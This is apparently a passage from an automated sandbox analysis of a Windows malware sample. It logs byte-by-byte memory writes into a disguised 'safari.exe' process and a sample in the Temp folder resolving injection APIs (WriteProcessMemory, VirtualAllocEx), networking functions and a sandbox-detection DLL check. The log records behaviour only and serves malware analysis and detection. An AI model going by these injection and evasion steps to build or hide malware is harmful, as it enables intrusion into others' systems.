| Write | c:\program files (x86)\msecache\safari.exe | address = 0x50000a, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x50000b, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x50000c, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x50000d, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x50000e, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x50000f, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500010, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500011, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500012, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500013, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500014, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500015, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500016, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500017, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500018, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500019, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x50001a, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x50001b, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x50001c, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x50001d, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x50001e, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x50001f, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500020, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500021, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500022, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500023, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500024, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500025, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500026, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500027, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500028, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500029, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x50002a, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x50002b, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x50002c, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x50002d, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x50002e, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x50002f, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500030, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500031, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500032, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500033, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500034, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500035, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500036, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500037, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500038, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500039, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x50003a, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x50003b, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x50003c, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x7782d9b0, size = 1 |
|
2 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x7782d9b1, size = 1 |
|
2 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x7782d9b2, size = 1 |
|
2 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x7782d9b3, size = 1 |
|
2 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x7782d9b4, size = 1 |
|
2 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x710000, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x710001, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x710002, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x710003, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x710004, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700000, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700001, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700002, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700003, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700004, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700005, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700006, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700007, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700008, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700009, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x70000a, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x70000b, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x70000c, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x70000d, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x70000e, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x70000f, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700010, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700011, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700012, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700013, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700014, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700015, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700016, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700017, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700018, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700019, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x70001a, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x70001b, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x70001c, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x70001d, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x70001e, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x70001f, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700020, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700021, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700022, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700023, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700024, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700025, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700026, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700027, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700028, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700029, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x70002a, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x70002b, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x70002c, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x70002d, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x70002e, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x70002f, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700030, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700031, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700032, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700033, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700034, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700035, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700036, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700037, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700038, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x700039, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x70003a, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x70003b, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x70003c, size = 1 |
|
1 |
Module (1394)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x765a0000 |
|
2 | |
| Load | k | base_address = 0x0 |
|
1 | |
| Load | eappcfg.dll | base_address = 0x6ffa0000 |
|
1 | |
| Load | Kernel32.dll | base_address = 0x765a0000 |
|
1 | |
| Load | WININET.dll | base_address = 0x702b0000 |
|
1 | |
| Load | PSAPI.DLL | base_address = 0x772c0000 |
|
1 | |
| Load | USERENV.dll | base_address = 0x701e0000 |
|
1 | |
| Load | WS2_32.dll | base_address = 0x746c0000 |
|
1 | |
| Load | WINHTTP.dll | base_address = 0x70210000 |
|
1 | |
| Load | NETAPI32.dll | base_address = 0x77490000 |
|
1 | |
| Load | Secur32.dll | base_address = 0x6ff60000 |
|
1 | |
| Load | SHELL32.dll | base_address = 0x75120000 |
|
2 | |
| Load | ole32.dll | base_address = 0x771d0000 |
|
1 | |
| Load | RPCRT4.dll | base_address = 0x75070000 |
|
1 | |
| Load | ntdll.dll | base_address = 0x77960000 |
|
6 | |
| Load | advapi32 | base_address = 0x74aa0000 |
|
1 | |
| Get Handle | WININET.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\shlwapi.dll | base_address = 0x74b20000 |
|
1 | |
| Get Handle | PSAPI.DLL | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\ntdll.dll | base_address = 0x77960000 |
|
14 | |
| Get Handle | USERENV.dll | base_address = 0x0 |
|
1 | |
| Get Handle | WS2_32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | WINHTTP.dll | base_address = 0x0 |
|
1 | |
| Get Handle | NETAPI32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x765a0000 |
|
545 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x77810000 |
|
1 | |
| Get Handle | c:\windows\syswow64\advapi32.dll | base_address = 0x74aa0000 |
|
1 | |
| Get Handle | Secur32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | SHELL32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | ole32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | base_address = 0x400000 |
|
4 | |
| Get Handle | dbghelp.dll | base_address = 0x0 |
|
1 | |
| Get Handle | sbiedll.dll | base_address = 0x0 |
|
1 | |
| Get Filename | ole32.dll | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 260 |
|
1 | |
| Get Filename | c:\windows\syswow64\ntdll.dll | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
3 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77992bd0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x765b1ba0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount, address_out = 0x765c5eb0 |
|
2 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpQueryInfoA, address_out = 0x70351880 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetQueryOptionA, address_out = 0x70357d00 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetSetOptionA, address_out = 0x70351dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpAddRequestHeadersA, address_out = 0x7032c3f0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetCloseHandle, address_out = 0x7037d200 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpSendRequestA, address_out = 0x70378e60 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetConnectA, address_out = 0x703f0da0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetReadFile, address_out = 0x70337320 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpAddRequestHeadersW, address_out = 0x7032bec0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetOpenW, address_out = 0x70378490 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpOpenRequestW, address_out = 0x70330fd0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = PathFindFileNameW, address_out = 0x74b37a50 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCatW, address_out = 0x74b484a0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCpyW, address_out = 0x74b484e0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCmpIW, address_out = 0x74b34750 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCpyNW, address_out = 0x74b433f0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrStrA, address_out = 0x74b43570 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrDupW, address_out = 0x74b39060 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrStrIW, address_out = 0x74b381b0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrRChrW, address_out = 0x74b3d1c0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCmpW, address_out = 0x74b35fe0 |
|
1 | |
| Get Address | c:\windows\syswow64\psapi.dll | function = GetProcessImageFileNameA, address_out = 0x772c16a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = _chkstk, address_out = 0x779da570 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlAllocateHeap, address_out = 0x77992bd0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlFreeHeap, address_out = 0x77990230 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = memset, address_out = 0x779dcfe0 |
|
1 | |
| Get Address | c:\windows\syswow64\userenv.dll | function = CreateEnvironmentBlock, address_out = 0x701e4480 |
|
1 | |
| Get Address | c:\windows\syswow64\userenv.dll | function = GetProfilesDirectoryW, address_out = 0x701e45a0 |
|
1 | |
| Get Address | c:\windows\syswow64\userenv.dll | function = DestroyEnvironmentBlock, address_out = 0x701e4510 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 52, address_out = 0x746f1110 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 2, address_out = 0x746d3230 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 3, address_out = 0x746cead0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 11, address_out = 0x746c5240 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 23, address_out = 0x746ce6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 15, address_out = 0x746c4a90 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 115, address_out = 0x746c6520 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpQueryDataAvailable, address_out = 0x702347a0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpReceiveResponse, address_out = 0x7021c8e0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpOpen, address_out = 0x70246720 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpAddRequestHeaders, address_out = 0x70229400 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpQueryHeaders, address_out = 0x702309c0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpReadData, address_out = 0x70234ea0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpOpenRequest, address_out = 0x70248dd0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpSetOption, address_out = 0x702306f0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpCloseHandle, address_out = 0x70233ad0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpSendRequest, address_out = 0x7023bfd0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpConnect, address_out = 0x70242880 |
|
1 | |
| Get Address | c:\windows\syswow64\netapi32.dll | function = NetApiBufferFree, address_out = 0x6ff916d0 |
|
1 | |
| Get Address | c:\windows\syswow64\netapi32.dll | function = NetUserGetInfo, address_out = 0x6ff733a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualProtectEx, address_out = 0x765e2790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAllocEx, address_out = 0x765e2730 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsBadReadPtr, address_out = 0x765b2510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x765baba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateMutexW, address_out = 0x765c66f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateToolhelp32Snapshot, address_out = 0x765c7b50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Process32NextW, address_out = 0x765bd290 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Process32FirstW, address_out = 0x765bf5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetExitCodeThread, address_out = 0x765c4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteProcessMemory, address_out = 0x765e2850 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalMemoryStatusEx, address_out = 0x765bafe0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenMutexW, address_out = 0x765c6770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x765b2ad0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersionExW, address_out = 0x765baa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageA, address_out = 0x765bf830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpiA, address_out = 0x765b7830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileAttributesW, address_out = 0x765c6a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MoveFileExW, address_out = 0x765bb2b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileW, address_out = 0x765c6ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x765b7970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x765b3690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEnvironmentVariableA, address_out = 0x765e22f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemInfo, address_out = 0x765ba0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x765c0160 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x765ba8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileTime, address_out = 0x765c6a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTime, address_out = 0x765c4940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SystemTimeToFileTime, address_out = 0x765c4c10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileSize, address_out = 0x765c6a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x765c68c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindClose, address_out = 0x765c68e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x765c6c00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointer, address_out = 0x765c6c40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileTime, address_out = 0x765c6c60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualProtect, address_out = 0x765b7a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x765b38c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x765bcd50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x765c5100 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForMultipleObjects, address_out = 0x765c6800 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteAtom, address_out = 0x765bcb20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x765b8c80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x765c6820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779c7a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleA, address_out = 0x765b99f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalAddAtomW, address_out = 0x765b1be0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x765b8bf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ProcessIdToSessionId, address_out = 0x765b8fa0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x765b7990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x765b3870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryA, address_out = 0x765c4bf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x765c6630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x765b9b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x765b78b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindAtomW, address_out = 0x765b20f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x765b23e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x765b7710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x765bb000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x765b9bc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibrary, address_out = 0x765b9f50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetExitCodeProcess, address_out = 0x765bfdb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x765b9fd0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringA, address_out = 0x765bfde0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyA, address_out = 0x765bea30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x765c7b30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetProcessPriorityBoost, address_out = 0x765bfef0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetPriorityClass, address_out = 0x765b9e90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x765b9b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadPriority, address_out = 0x765b9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentVariableW, address_out = 0x765b9970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x765b75f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcatW, address_out = 0x765dd170 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalAlloc, address_out = 0x765b9950 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalFree, address_out = 0x765bccf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x765b79a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x765dd260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x765bcc30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x765c6bb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEnvironmentVariableW, address_out = 0x765be9e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTempPathW, address_out = 0x765c6b30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x765c6890 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTempFileNameW, address_out = 0x765c6b10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x765b7a30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x7798efe0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualFree, address_out = 0x765b7600 |
|
1 | |
